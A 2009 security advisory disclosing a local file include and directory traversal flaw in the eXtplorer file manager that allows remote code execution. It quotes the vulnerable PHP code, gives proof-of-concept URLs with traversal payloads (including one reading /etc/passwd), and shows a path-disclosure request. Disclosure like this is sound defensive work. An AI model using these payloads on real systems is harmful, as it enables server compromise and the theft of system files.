============================================= INTERNET SECURITY AUDITORS ALERT 2009-002 - Original release date: January 7th, 2009 - Last revised: March 2nd, 2009 - Discovered by: Juan Galiana Lara - Severity: 9/10 (CVSS scored) ============================================= I. VULNERABILITY ------------------------- eXtplorer standalone & Joomla!/Mambo Remote Code Execution vulnerability II. BACKGROUND ------------------------- eXtplorer is a web-based File Management Component for all your needs. It has a desktop-application-like interface with drag&drop, grid and a directory tree and makes heavy use of the ExtJS Javascript Library. It's widely used to access and modify the files and directories on your server via FTP or direct file access. It runs natively under Joomla! 1.5.x, 1.0.x, Mambo component and can also be used as a standalone app. Is based on Quixplorer (available at http://sourceforge.net/projects/quixplorer/). eXtplorer is released under a dual-license: the Mozilla Public License (MPL 1.1) and the GNU General Public License (GNU/GPL). III. DESCRIPTION ------------------------- eXtplorer is prone to a local file include and directory traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. The parameter 'lang' is not properly sanitized. Since the application allows to upload files to the server could be combined with previous vulnerabilities to allow an attacker to view any local file or execute arbitrary code remotely in the context of the webserver. This may aid in launching further attacks. In order to perform the attack, an attacker could upload a PHP maliciuos code (upload action is allowed by the application), then exploit a bug to know the full path to the local file recently uploaded (if 'display_errors' directive is set to On) and then include it exploiting the local file include and directory traversal flaw (using ../../path/to/file) to finally execute the php code. Successfully explotation of this flaw may aid in the compromise of the server in the context of the webserver. The software is affected running standalone or as a Joomla!/Mambo component. IV. PROOF OF CONCEPT ------------------------- The affected code: File: include/init.php Line 100 $GLOBALS["language"] = $mainframe->getUserStateFromRequest( 'language', 'lang', $default_lang ); File: include/init.php Line: 145 // Necessary files require_once( _EXT_PATH."/config/conf.php" ); if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"].".php")) { require_once( _EXT_PATH."/languages/".$GLOBALS["language"].".php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english.php" ); } if( file_exists(_EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php")) { require_once( _EXT_PATH."/languages/".$GLOBALS["language"]."_mimes.php" ); <- HERE } else { require_once( _EXT_PATH."/languages/english_mimes.php" ); } the file include/init.php is included in all the request to the application. Here is a poc: PoC: http://site/path/?lang=../../path/to/maliciuos_uploaded_code PoC: http://site/path/?lang=../../../../../etc/passwd%00 The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any php code he want. Is also possible to hide the crafted parameters data including it thougth POST method, making detection more difficult to site administrator. In order to successfully perform this attack the attacker must have the full path where the files are uploaded, and it is easy to get making a request like this: POST /path/index.php HTTP/1.1 Host: host User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://host/path Content-Length: 80 Cookie: PHPSESSID=<my_phpsessid>; eXtplorer=<my_cookie> Pragma: no-cache Cache-Control: no-cache start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files The response is a JSON file: {"action":"","message":"\/var\/www\/path\/\/x : This directory doesn\\'t exist.","error":"\/var\/www\/path\/\/x : This directory doesn\\'t exist.","success":false} Sending "x", the application came back "/var/www/path/x". V. BUSINESS IMPACT ------------------------- An attacker could execute arbitrary code remotely and maybe gain access to the operating system of the server. VI. SYSTEMS AFFECTED ------------------------- Versions prior to 2.0.0 of eXtplorer are vulnerable. VII. SOLUTION ------------------------- Upgrade to version 2.0.1 of eXtplorer. It can be downloaded from http://extplorer.sourceforge.net VIII. REFERENCES ------------------------- http://extplorer.sf.net IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- March 02, 2009: Initial release XI. DISCLOSURE TIMELINE ------------------------- January 07, 2009: eXtplorer contacted January 15, 2009: eXtplorer release version 2.0.1 March 02, 2009: Vulnerability published XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.